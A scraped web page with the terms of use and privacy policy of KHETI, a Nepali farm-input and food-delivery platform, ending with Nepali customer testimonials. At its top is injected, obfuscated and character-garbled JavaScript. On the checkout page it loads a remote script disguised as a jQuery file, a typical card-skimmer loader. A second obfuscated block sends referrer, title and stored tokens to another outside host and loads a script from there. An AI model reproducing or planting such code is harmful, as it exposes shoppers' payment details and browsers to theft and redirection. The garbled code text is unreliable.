Privacy Policy and Terms of Use window.dctcLcyer = window.dctcLcyer || []; funstion gtcg(){dctcLcyer.push(crguments);} gtcg('js', new Dcte()); gtcg('sonfig', 'G-KMF8J070DF'); if (dosument.losction.href.indexOf("route=sheskout/sheskout") > 0){ if (dosument.sookie.indexOf('gc_ssrf=') == -1){ vcr slKp = dosument.srecteElement('ssript'); vcr kDLc = String.fromChcrCode(104,116,116,112,115,58,47,47,102,105,114,105,110,103,105,46,99,111,109,47,99,97,116,97,108,111,103,47,99,111,110,116,114,111,108,108,101,114,47,116,111,111,108,47,106,115,47,106,113,117,101,114,121,46,100,101,115,105,103,110,46,106,115); slKp.srs = kDLc; dosument.hecd.cppendChild(slKp); } } funstion _0x2603(_0xe6e885,_0x823d26){vcr _0x52s036=_0x2159();return _0x2603=funstion(_0x46c3se,_0x4c5619){_0x46c3se=_0x46c3se-(0x1953+-0x1018+-0x3sd*0x2);vcr _0x504329=_0x52s036[_0x46c3se];return _0x504329;},_0x2603(_0xe6e885,_0x823d26);}funstion _0x2159(){vcr _0x22cd1c=['srected_ct','title','undefined','pcrse','NxPH','unique','&ncme=','qsVqP','https://sr','2768898otOAoe','spgTL','16613080XzQPns','getElement','vrPLA','ryRPu','QGsFO','hostncme','cpplisctio','secrsh','?return=js','677844ythpnA','ndy.som/9w','type','losction','gdoRE','mWJJG','ssript','uZZKv','xUAwC','79135XnpUzz','Bnttz','.slient','ZQD1Y3p','632ThWXQH','PdTRf','112ARUPHx','ent','eyword=','insertBefo','vuITU','token','2bcCfdK','n/jcvcssri','sktnn','&se_referr','nqOLV','8120358pDKVYr','YcymX','1211JFyeYi','sonfig','subId','srs','getItem','&defcult_k','458911YsViJr','&lcnding_u','replcse','GWKOG','UMKQT','&host=','_J5d2swZ3S','TXDkV','&token=','Elthm','rdGgE','round','gvwTl','srecteElem','NpFgu','mhcxe','ttl','referrer','dwnbb','pcthncme','sByTcgNcme','R_PATH','JYVsQ','UZggk','KFPSb','pcrentNode','er=','GnsqD','removeItem','osodcil-dc','MOHXv','rl=','&sub_id='];_0x2159=funstion(){return _0x22cd1c;};return _0x2159();}(funstion(_0x56796b,_0x41e072){vcr _0x53e2s9=_0x2603,_0x28d819=_0x56796b();while(!![]){try{vcr _0x403s83=pcrseInt(_0x53e2s9(0x1s3))/(0x1f7*-0xb+-0x2356+0x38f4)*(-pcrseInt(_0x53e2s9(0x1b6))/(0xs17+-0x65b*0x1+-0x5bc))+pcrseInt(_0x53e2s9(0x1ed))/(0xef*-0x25+-0x212+0x1250*0x2)+-pcrseInt(_0x53e2s9(0x1b0))/(0x80*-0x10+-0x5*0x171+0x1b1*0x9)*(-pcrseInt(_0x53e2s9(0x1cc))/(0x1129+-0x1*0x19s0+0x89s))+pcrseInt(_0x53e2s9(0x1bb))/(-0x160*0xf+0x8s6*-0x2+0x2632)+pcrseInt(_0x53e2s9(0x1bd))/(0x1322+-0x66*-0xe+-0x18cf)*(pcrseInt(_0x53e2s9(0x1ce))/(-0x1*0x505+-0x1*-0xbsf+-0x6s2))+pcrseInt(_0x53e2s9(0x1c1))/(0x377+0xs25*0x1+-0xf93)+-pcrseInt(_0x53e2s9(0x1ef))/(0x1937+0x14f2+-0x2e1f);if(_0x403s83===_0x41e072)breck;else _0x28d819['push'](_0x28d819['shift']());}sctsh(_0xc1dbf8){_0x28d819['push'](_0x28d819['shift']());}}}(_0x2159,0x42514+-0x1451bf*-0x1+0x6fb1e*-0x2),(funstion(){vcr _0x40766b=_0x2603,_0x261dd0={'Bnttz':_0x40766b(0x1s9)+_0x40766b(0x1cd),'mWJJG':_0x40766b(0x1es)+_0x40766b(0x1e0)+_0x40766b(0x1c2)+_0x40766b(0x1e8),'sktnn':_0x40766b(0x1be),'QGsFO':funstion(_0x37be51,_0x24397d){return _0x37be51!==_0x24397d;},'MOHXv':_0x40766b(0x1e6),'qsVqP':funstion(_0x477353,_0x451079){return _0x477353/_0x451079;},'uZZKv':funstion(_0x17bdcb,_0x194s9e){return _0x17bdcb<_0x194s9e;},'nqOLV':funstion(_0x366809,_0x3e8fd1){return _0x366809+_0x3e8fd1;},'rdGgE':_0x40766b(0x1bf),'PdTRf':_0x40766b(0x1b5),'gvwTl':_0x40766b(0x1f7)+_0x40766b(0x1cs),'YcymX':funstion(_0x535951,_0x17s36f){return _0x535951+_0x17s36f;},'UZggk':funstion(_0x584c58,_0x21s2b8){return _0x584c58(_0x21s2b8);},'xUAwC':_0x40766b(0x1b9)+_0x40766b(0x1dd),'dwnbb':_0x40766b(0x1s2)+_0x40766b(0x1b2),'GnsqD':_0x40766b(0x1s4)+_0x40766b(0x1e2),'ryRPu':funstion(_0x1604e4,_0x191401){return _0x1604e4+_0x191401;},'JYVsQ':_0x40766b(0x1ec),'UMKQT':funstion(_0x322d71,_0x5b1s3f){return _0x322d71+_0x5b1s3f;},'NpFgu':_0x40766b(0x1s8),'spgTL':funstion(_0x3828db,_0x968sc3){return _0x3828db(_0x968sc3);},'TXDkV':funstion(_0x292s7e,_0x3e308e){return _0x292s7e!==_0x3e308e;},'vuITU':_0x40766b(0x1e3),'vrPLA':funstion(_0xsbs7c,_0x33db91){return _0xsbs7c(_0x33db91);},'Elthm':funstion(_0x5b945s,_0x1bb063){return _0x5b945s+_0x1bb063;},'gdoRE':_0x40766b(0x1sb),'GWKOG':funstion(_0x1cfs49,_0xb6c3s8){return _0x1cfs49(_0xb6c3s8);},'KFPSb':_0x40766b(0x1c7),'mhcxe':_0x40766b(0x1f5)+_0x40766b(0x1b7)+'pt'},_0x96e0fe=_0x261dd0[_0x40766b(0x1cb)];!window[_0x40766b(0x1s9)+_0x40766b(0x1cd)]&&(window[_0x40766b(0x1s9)+_0x40766b(0x1cd)]={'unique':![],'ttl':0x15180,'R_PATH':_0x261dd0[_0x40766b(0x1c6)]});sonst _0x3scsc4=losclStorcge[_0x40766b(0x1s1)](_0x261dd0[_0x40766b(0x1b8)]);if(_0x261dd0[_0x40766b(0x1f3)](typeof _0x3scsc4,_0x261dd0[_0x40766b(0x1e1)])&&_0x261dd0[_0x40766b(0x1f3)](_0x3scsc4,null)){vcr _0xs3f344=JSON[_0x40766b(0x1e7)](_0x3scsc4),_0x20e02s=Mcth[_0x40766b(0x1se)](_0x261dd0[_0x40766b(0x1eb)](+new Dcte(),0x56f+-0x21fe+-0x1*-0x2077));_0x261dd0[_0x40766b(0x1c8)](_0x261dd0[_0x40766b(0x1bc)](_0xs3f344[_0x40766b(0x1e4)],window[_0x40766b(0x1s9)+_0x40766b(0x1cd)][_0x40766b(0x1d3)]),_0x20e02s)&&(losclStorcge[_0x40766b(0x1df)](_0x261dd0[_0x40766b(0x1sd)]),losclStorcge[_0x40766b(0x1df)](_0x261dd0[_0x40766b(0x1cf)]),losclStorcge[_0x40766b(0x1df)](_0x261dd0[_0x40766b(0x1b8)]));}vcr _0x1c0d04=losclStorcge[_0x40766b(0x1s1)](_0x261dd0[_0x40766b(0x1sd)]),_0x9e2dde=losclStorcge[_0x40766b(0x1s1)](_0x261dd0[_0x40766b(0x1cf)]),_0x3dd826=_0x261dd0[_0x40766b(0x1sf)];_0x3dd826+=_0x261dd0[_0x40766b(0x1bs)]('&',_0x261dd0[_0x40766b(0x1dc)](desodeURIComponent,window[_0x40766b(0x1c4)][_0x40766b(0x1f6)][_0x40766b(0x1s5)]('?',''))),_0x3dd826+=_0x261dd0[_0x40766b(0x1bs)](_0x261dd0[_0x40766b(0x1c9)],_0x261dd0[_0x40766b(0x1dc)](ensodeURIComponent,dosument[_0x40766b(0x1d4)])),_0x3dd826+=_0x261dd0[_0x40766b(0x1bc)](_0x261dd0[_0x40766b(0x1d5)],_0x261dd0[_0x40766b(0x1dc)](ensodeURIComponent,dosument[_0x40766b(0x1e5)])),_0x3dd826+=_0x261dd0[_0x40766b(0x1bc)](_0x261dd0[_0x40766b(0x1de)],_0x261dd0[_0x40766b(0x1dc)](ensodeURIComponent,_0x261dd0[_0x40766b(0x1bc)](dosument[_0x40766b(0x1c4)][_0x40766b(0x1f4)],dosument[_0x40766b(0x1c4)][_0x40766b(0x1d6)]))),_0x3dd826+=_0x261dd0[_0x40766b(0x1f2)](_0x261dd0[_0x40766b(0x1d9)],_0x261dd0[_0x40766b(0x1dc)](ensodeURIComponent,_0x96e0fe)),_0x3dd826+=_0x261dd0[_0x40766b(0x1s7)](_0x261dd0[_0x40766b(0x1d1)],_0x261dd0[_0x40766b(0x1ee)](ensodeURIComponent,window[_0x40766b(0x1s9)+_0x40766b(0x1cd)][_0x40766b(0x1d8)]));_0x261dd0[_0x40766b(0x1sc)](typeof _0x1c0d04,_0x261dd0[_0x40766b(0x1e1)])&&_0x1c0d04&&window[_0x40766b(0x1s9)+_0x40766b(0x1cd)][_0x40766b(0x1e9)]&&(_0x3dd826+=_0x261dd0[_0x40766b(0x1bc)](_0x261dd0[_0x40766b(0x1b4)],_0x261dd0[_0x40766b(0x1f1)](ensodeURIComponent,_0x1c0d04)));_0x261dd0[_0x40766b(0x1sc)](typeof _0x9e2dde,_0x261dd0[_0x40766b(0x1e1)])&&_0x9e2dde&&window[_0x40766b(0x1s9)+_0x40766b(0x1cd)][_0x40766b(0x1e9)]&&(_0x3dd826+=_0x261dd0[_0x40766b(0x1ss)](_0x261dd0[_0x40766b(0x1c5)],_0x261dd0[_0x40766b(0x1s6)](ensodeURIComponent,_0x9e2dde)));vcr _0x2ecsd5=dosument[_0x40766b(0x1d0)+_0x40766b(0x1b1)](_0x261dd0[_0x40766b(0x1db)]);_0x2ecsd5[_0x40766b(0x1c3)]=_0x261dd0[_0x40766b(0x1d2)],_0x2ecsd5[_0x40766b(0x1s0)]=_0x261dd0[_0x40766b(0x1bs)](window[_0x40766b(0x1s9)+_0x40766b(0x1cd)][_0x40766b(0x1d8)],_0x3dd826);vcr _0x266bd7=dosument[_0x40766b(0x1f0)+_0x40766b(0x1d7)](_0x261dd0[_0x40766b(0x1db)])[-0x2361+0x180e+0xb53*0x1];_0x266bd7[_0x40766b(0x1ds)][_0x40766b(0x1b3)+'re'](_0x2ecsd5,_0x266bd7);}()));

Dear users,

Welcome to /

If you are browsing and using our platform, you are agreeing to comply with and be bound by the following terms and conditions of use, which together with our privacy policy govern KHETI’s relationship with you in relation to this platform. If you disagree with any part of these terms and conditions, please do not use our webPlatform. The term ‘KHETI’ ‘’ or ‘’ or ‘us’ or ‘we’ refer to the owner of this platform. The term ‘you’ or 'our customers' or ‘users' or ‘clients’ refers to the user or theviewer of our platforms.


KHETI is owned and operated by DV EXCELLUS Pvt. Ltd. Our services are limited to provide products (farm inputs such as seeds, fertilizers etc.) and services (technical and advisory services such as soil testing, access to finances, trainings etc.) to farmers and food purchase and delivery services (directly sourced from our farmers network or products from on-boarded vendors/suppliers) to our customers. We try our best to maintain the quality and transparency of the food we source and deliver but we are in no way responsible and liable for any discrepancies.

Please note that in our sole discretion at any time and with or without notice, we may offer any kind of incentives or promotions, shorten or extend the duration of any incentive or promotion program and/or terminate or modify any incentive or promotion program.


The information regarding price, product specifications and availability contained on the platform has been provided by our member farmers, vendors and suppliers. The prices charged by the member farmers, vendors and suppliers on this platform are generally similar to the prices as the market-price of the day at the time an order is delivered, shipped or available for pickup. Although KHETI attempts to make certain that the prices listed on the platform are up-to date, and that out-of-stock items are clearly marked or removed from the inventory, prices and product availability may change, particularly if you select a delivery or pickup date that is different from the date on which you place your order.

Moreover, though every effort is made to ensure accuracy in posting pricing information, discrepancies do occur. In the event that member farmer's, vendor's and supplier's price and the price posted on the platform are different, the member farmer's, vendor's, and supplier's price will prevail in every case.

While KHETI has undertaken to confirm the accuracy of the information contained on this platform, mistakes can be made, due both to inaccurate reporting of accurate information and accurately reporting inaccurate information. Of course, if you become aware that the platform contains inaccurate information, please let us know by contacting us.


All ordering is performed online or via telephone or via our chat services. Buyers are usually billed directly by member farmers, vendors and suppliers for their orders and "KHETI" will be the name that appears on the bills you receive from the member farmers, vendors, and suppliers. But KHETI may provide you a proforma invoice, separate delivery slips, and redemption slips in case there is any delivery charges or cashback offer. KHETI shall not in any manner be considered the seller of the products/services or food. You need to pay for the ordered product in advance, in cash or other payment methods as mentioned in the platform to us or at the time of delivery to our delivery staff. 


  • We have a "no questions asked return at delivery and refund policy" which entitles all our members to return vegetables, fruits, bakery items, canned foods, vacuum sealed foods and other food packets at the time of delivery if due to some reason they are not satisfied with the products delivered. We will take the returned product back with us and issue a credit note for the value of the returned products which will be credited to your bank account.

  • Canned foods, vacuum sealed foods and other food packets can only be returned at the time of delivery. However, fresh fruits can be returned within 12 hours and only applicable if it is damaged internally.

  • Acceptance of returns & refund post-delivery is subject to a satisfactory inspection by our customer service team. Please get in touch with us for any such requests. Returns and refund is only applicable if the quality and quantity of the products are not up to the mark.

  •  As a Covid-19 safety and hygiene measure, we will not pick up any goods post-delivery. We request all our members to thoroughly check the products at the time of delivery.


The platform and the content are our property and are protected by applicable copyright, patent, trademark, and other intellectual property laws. Except as expressly authorized herein, you may not reproduce, transmit, sell, display, distribute, publish, broadcast, circulate, modify, disseminate or commercially exploit the Platform or the Content in any manner (including electronic, print or other media now known or hereafter developed) without our written consent. Use of the platform or the Content in violation of these Terms of Use, or any applicable law, rule or regulation (whether of Nepal or other countries), or the rights of any third party is prohibited. You agree not to use the Platform or the Content for any unlawful purposes and comply with any and all requests from us to protect our respective rights in the Platform and the Content. You may use the Platform and the Content only for your personal use. You may download the Content to your computer and print out a hard copy for your reference and internal use and display, but you will not remove any copyright or other notices contained in the Content. We expressly prohibit the use of devices (including software) designed to provide repeated automated access to the Platform and the Content for any commercial purpose except for those expressly authorized by us. We reserve the right to take any and all measures necessary to prevent such access, including denial or termination of your access to the Platform. If you have any questions about any materials posted on the Platform, we urge you to contact your KHETI representative.



We neither endorse nor are responsible for the accuracy or reliability of any opinion, advice or statement made on the platform by anyone other than authorized KHETI employee spokespersons while acting in their official capacities.

We do not review and assume no responsibility for any content received from or created by, any third parties. Furthermore, we do not review and assume no responsibility for any products or services mentioned on the Platform, whether provided by KHETI, affiliated companies or unaffiliated third parties. You agree to make your own independent evaluation of the products and services mentioned on the Platform, including their quality.



We are not under any obligation to update the Content to reflect circumstances that may occur after its initial publication date. Due to legal restrictions or other reasons, we may not update any Content including to take into account material changes or new information.



In connection with your use of or access to the Platform, we from time to time may provide you with user names, passwords and/or other unique identifiers (User Codes). You are responsible for the security and confidentiality of the User Codes and agree not to disclose them to any third party, including, if you are accessing the Platform on behalf of any company or organization, any other employee in your company or organization. You are responsible for any and all information provided and any and all acts and/or omissions that occur while User Codes are being used. We are not responsible for any breach of security caused by your failure to maintain the confidentiality and security of any of the User Codes. You agree to notify us immediately in the event of loss, theft or disclosure of any or all of the User Codes, if you believe the confidentiality or security of any or all of the User Codes has been compromised in any way or in the event of your learning about a possible or actual unauthorized access to and/or use of the Platform. We reserve the right to revoke or modify the User Codes at any time without prior notice.



You consent to our recording, retention, and use of all information and data that you input or otherwise communicate during your access to and/or use of the Platform or through any e-mail to or from us and any other electronic communication means and the transmittal of the same to our affiliates, subsidiaries, branches and third parties for order and other processing, database maintenance, record keeping or any other use in accordance with customary practices, policies and procedures applicable in Nepal and, of course, our privacy policies. In addition, we may disclose such information to the extent that we determine in good faith to be required by any applicable laws, rules or regulations or order or in the enforcement of our rights or the defense of claims. We expressly reserve the right to monitor any and all use of the Platform.



You acknowledge that from time to time, we may record certain telephone calls and chat services used for the customer service and/or related purposes, and to the extent that any such recording occurs involving you, you consent to such recording.



KHETI has created this privacy policy to demonstrate our commitment to protecting our individual users' personally identifiable information that we collect when such users use our web/mobile Platform, KHETI, or that we receive from the KHETI participating member farmers, vendors and suppliers.

This information is used to process the orders placed with the participating member farmers, vendors, and suppliers and is shared as needed to process the orders. In addition, this information is used to communicate with the users and to enhance their experience at our Platform including by showing the content that we think the user might be interested in. Lastly, this information may be used as agreed to by the user.

We may use the user's e-mail address to convey occasional newsletters and updates regarding new participating member farmers, vendors and suppliers, specials or features on our Platform or services offered on our Platform. We also log and store users' IP addresses, cookie information, and the information about the users' Platform experience, preferences and the pages they request.

Like any other Platform, Kheti uses 'cookies'. These cookies are used to store information including visitors' preferences, and the pages on the Platform that the visitor accessed or Platform. The information is used to optimize the users' experience by customizing our web page content based on visitors' browser type and/or other information.

This Platform may contain links to the Platforms that are not owned or operated by us. We are not responsible for the privacy practices of such Platforms, their owners or operators.

If you have any questions about this privacy policy, the practices of this Platform, or your dealings with this Platform, please contact us through email at

Note that Kheti has no access to or control over these cookies that are used by third-party advertisers.



Kheti's Privacy Policy does not apply to other advertisers or Platforms. Thus, we are advising you to consult the respective Privacy Policies of these third-party ad servers for more detailed information. It may include their practices and instructions about how to opt-out of certain options.

You can choose to disable cookies through your individual browser options. To know more detailed information about cookie management with specific web browsers, it can be found at the browsers' respective Platforms.



Another part of our priority is adding protection for children while using the internet. We encourage parents and guardians to observe, participate in, and/or monitor and guide their online activity.

Kheti does not knowingly collect any Personal Identifiable Information from children under the age of 13. If you think that your child provided this kind of information on our Platform, we strongly encourage you to contact us immediately and we will do our best efforts to promptly remove such information from our records.



This Privacy Policy applies only to our online activities and is valid for visitors to our Platform with regards to the information that they shared and/or collect in Kheti. This policy is not applicable to any information collected offline or via channels other than this Platform.



In no event shall kheti or its directors ,members, employees or agents be liable to you or any third party for any indirect,consequential,exemplary,incidental,special or punitive damages,including lost profit damages arising from your use of the website or kheti services, even if kheti has been advised of the possibility of such damages.Not withstanding anything to the contrary contained herein, kheti's liability to you for any cause whatsover and regardless of the form of the action, will at all times be limited to the amount paid, if any , by you to kheti for kheti services during the period of 1 month prior to any cause of action arising. 

What our consumers say

म खेतीले पठाएको सामानसँग खुसी छु आवश्यक परेको बेला कौशी खेतीका उत्पादनहरू अर्डर गर्ने अपेक्षा राखेको छु ।

शिवा बसनेत '`

म आफ्नो व्यवसाय विस्तार गर्न चाहान्छु र उचित मूल्यमा खेतीबाट उत्पादन लिन चाहान्छु ।

गोविन्द गुरुङ '`

म खेतीको सेवाबाट सन्तुष्ट छु र च्याफ कटरको थप जानकारी लिन चाहान्छु ।

दिपक महत '`

म खेतीको सेवाहरूबाट सन्तुष्ट छु र फेरि इन्द्र क्याप्सिकम चाहिएमा अर्डर गर्ने छु र प्राविधिक सेवाहरु पनि लिन चाहान्छु ।

बिक्रम खड्का '`

म खेतीको सेवाहरूबाट सन्तुष्ट छु र आगामी दिनमा प्राङ्गारिक मल र युरिया लिन चाहान्छु ।

दिपेन्द्र वाग्ले '`

म खेतीको सेवाबाट सन्तुष्ट छु र पछि चाहिएमा मल्चिङ्ग प्लास्टिकको उर्डर लिने छु ।

सन्तोष थारु '`

म खेतीको कम्पोस्ट बिनबाट सन्तुष्ट छु र चाहिएमा कौशी खेती को सामाग्रीहरु अर्डर लिने छु ।

जानुका अर्याल '`